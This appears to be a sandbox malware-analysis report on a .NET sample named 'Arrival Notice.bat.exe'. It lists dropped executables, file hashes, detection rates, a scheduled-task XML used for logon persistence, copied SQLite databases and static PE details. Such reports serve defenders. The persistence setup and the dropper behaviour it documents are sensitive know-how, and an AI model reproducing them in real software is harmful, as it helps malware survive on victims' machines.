                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....x...............0.............r.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................R.......H........x..Dp............................................................}.....(.......(......{.....o.....*".(.....*...0..1.........{....o .....,...{.....o......+...{.....o......*....0............{....o!...r...p(".....,..r...p(#...&.8.....{....o!...r...p(".....,..r-..p(#...&.8`....{....o!...r...p(".....,..r_..p(#...&.85....{....o!...r...p(".....,..r...p(#...&.8.....{....o!...r...p(".......,..r...p(#...&.8.....{....o$.......(%.......(&...('.......(%.......(&...(".......,..r.

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):2232
                                                                            Entropy (8bit):5.379879166934507
                                                                            Encrypted:false
                                                                            SSDEEP:48:wWSU4y4RdymloUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:wLHyIdvqLgZ2KRHWLOugYs
                                                                            MD5:F241772F74BAA67309FE5FCF8B2AA90C
                                                                            SHA1:46A76E41F9E0AC02479F68D35D9BB25921515848
                                                                            SHA-256:50AC4970E5E6228BE0684E12F03A31CF964FF0FFE34C4258F53C7E16CE549429
                                                                            SHA-512:D100B56B382654E06E2D9F6B9B40E27C64A71F3E6D33BC8884DAA37CFD6FD47855B74D2EB850D51AE9AFDF9B492E85CFA2ECD4A0AFD9FA5B99B83E0796625053
                                                                            Malicious:false
                                                                            Preview:@...e.................................X..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                            C:\Users\user\AppData\Local\Temp\-6qxw.exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\compact.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):695808
                                                                            Entropy (8bit):7.940166802607003
                                                                            Encrypted:false
                                                                            SSDEEP:12288:ZFIsPAfpZOTgzeVDNTTPUz8mFRavsE9+dPKX38ctePh0E3m1BJSVYRrxNn:/IKGOcz6NPPK88EUh28ctcmL1Nn
                                                                            MD5:BD0CF4524C08026BA27005393E1F93A9
                                                                            SHA1:EDBC879DB8194B28F0CB398D180A593791954B76
                                                                            SHA-256:795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
                                                                            SHA-512:6BF1EE5EE504A52E3E974CAFD7A172B1317D4B6CD7BCC198EC57DBDF0BDB7019E4ADBB3F036D75C2D80E128B52D006ECD5791FBA7D33297AB39A9B1C2F16EC11
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                            Joe Sandbox View:
                                                                            • Filename: Arrival Notice.bat.exe, Detection: malicious, Browse
                                                                            • Filename: AWB_NO_907853880911.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....x...............0.............r.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................R.......H........x..Dp............................................................}.....(.......(......{.....o.....*".(.....*...0..1.........{....o .....,...{.....o......+...{.....o......*....0............{....o!...r...p(".....,..r...p(#...&.8.....{....o!...r...p(".....,..r-..p(#...&.8`....{....o!...r...p(".....,..r_..p(#...&.85....{....o!...r...p(".....,..r...p(#...&.8.....{....o!...r...p(".......,..r...p(#...&.8.....{....o$.......(%.......(&...('.......(%.......(&...(".......,..r.

                                                                            C:\Users\user\AppData\Local\Temp\3-zmD5K6

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\runonce.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\66159w4

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\compact.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qse1gjo.ksi.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44fj22rv.nnl.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ac12mpoh.l0c.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez4vznsg.cq0.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqftmxnb.xcs.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjtodr10.1le.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhwyre40.gyv.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpjioqv4.wgk.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\tmp4908.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1572
                                                                            Entropy (8bit):5.109412701459857
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTiuv
                                                                            MD5:B8DE27F90D0562C8203EE8D10EF13718
                                                                            SHA1:6D1EC0AC0889806C636E6B7EA37BBBD9656C23BE
                                                                            SHA-256:CD2BA3E9BC9BF0F61D7A154FA489A1612DFB83A9291DED0F9C1D52BD31F303A7
                                                                            SHA-512:E3CF63A5D5A219546913AD61485E06217BE6B56398EEDA31B9FDC53ADC6E0E2C02CCE3144039CCF33D269A38214596ADC669D0C8801229642C8E90C9B682CC7A
                                                                            Malicious:true
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                            C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1572
                                                                            Entropy (8bit):5.109412701459857
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTiuv
                                                                            MD5:B8DE27F90D0562C8203EE8D10EF13718
                                                                            SHA1:6D1EC0AC0889806C636E6B7EA37BBBD9656C23BE
                                                                            SHA-256:CD2BA3E9BC9BF0F61D7A154FA489A1612DFB83A9291DED0F9C1D52BD31F303A7
                                                                            SHA-512:E3CF63A5D5A219546913AD61485E06217BE6B56398EEDA31B9FDC53ADC6E0E2C02CCE3144039CCF33D269A38214596ADC669D0C8801229642C8E90C9B682CC7A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                            C:\Users\user\AppData\Roaming\dLrZsz.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):688640
                                                                            Entropy (8bit):7.930609058885228
                                                                            Encrypted:false
                                                                            SSDEEP:12288:E6L6MFvj7DxzQUrHEXZ9D0jE/iGYYmtPwtEUKL8IL55lsEG+:PxzQ3r9/vJSPwmUKL8IFso
                                                                            MD5:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            SHA1:8213AC015B088C484E7FFF3317E4E32D91B933CF
                                                                            SHA-256:48DCD87FC8E5DCA5CAA5788EE49D6CBDF1F8C76F789B2FD619665A07AF9B5C57
                                                                            SHA-512:E47300508C77DE3D20EB65E317A2218055EC252DA33BBFEBC8E2CE1A5313FF173FA1C66EDD1AA1E1B0D2DCC0D51FCE6775FA53F4C9ABF9C399D26AD704F4A5D0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...............0..x............... ........@.. ....................................@.....................................O....................................|..p............................................ ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B.......................H........l...F......F..................................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........(....r#..p~....o.....+..*&.(......*.0..9........~.........,".r3..p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....rk..p~....o......t.....+..*^..}.....(.......(.....*....0..........sH......}p.....{....(....o......{....o....ru..p(....-..{

                                                                            C:\Users\user\AppData\Roaming\dLrZsz.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.930609058885228
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Arrival Notice.bat.exe
                                                                            File size:688'640 bytes
                                                                            MD5:615f92f0ecef4eb70de1c52cee091948
                                                                            SHA1:8213ac015b088c484e7fff3317e4e32d91b933cf
                                                                            SHA256:48dcd87fc8e5dca5caa5788ee49d6cbdf1f8c76f789b2fd619665a07af9b5c57
                                                                            SHA512:e47300508c77de3d20eb65e317a2218055ec252da33bbfebc8e2ce1a5313ff173fa1c66edd1aa1e1b0d2dcc0d51fce6775fa53f4c9abf9c399d26ad704f4a5d0
                                                                            SSDEEP:12288:E6L6MFvj7DxzQUrHEXZ9D0jE/iGYYmtPwtEUKL8IL55lsEG+:PxzQ3r9/vJSPwmUKL8IFso
                                                                            TLSH:47E41284B36A7B31D13957F92C72304043FCA23752B4EBAAED9B21DA4172F4546E0E57
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...............0..x............... ........@.. ....................................@................................

                                                                            File Icon

                                                                            Icon Hash:90cececece8e8eb0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4a970a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0xC0621386 [Tue Apr 12 02:16:38 2072 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa96b50x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5bc.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa7c940x70.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xa77100xa78003a6b5df358846bf6973e1dd66f0c94b7False0.9335791744402985DOS executable (COM)7.936469180639003IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xaa0000x5bc0x6008df10943c02d473c5f827c94a064d12bFalse0.43359375data4.12119683020114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xac0000xc0x2001e107760511e270341c711fce622bb27False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0xaa0900x32cdata0.4421182266009852
                                                                            RT_MANIFEST0xaa3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Snort IDS Alerts

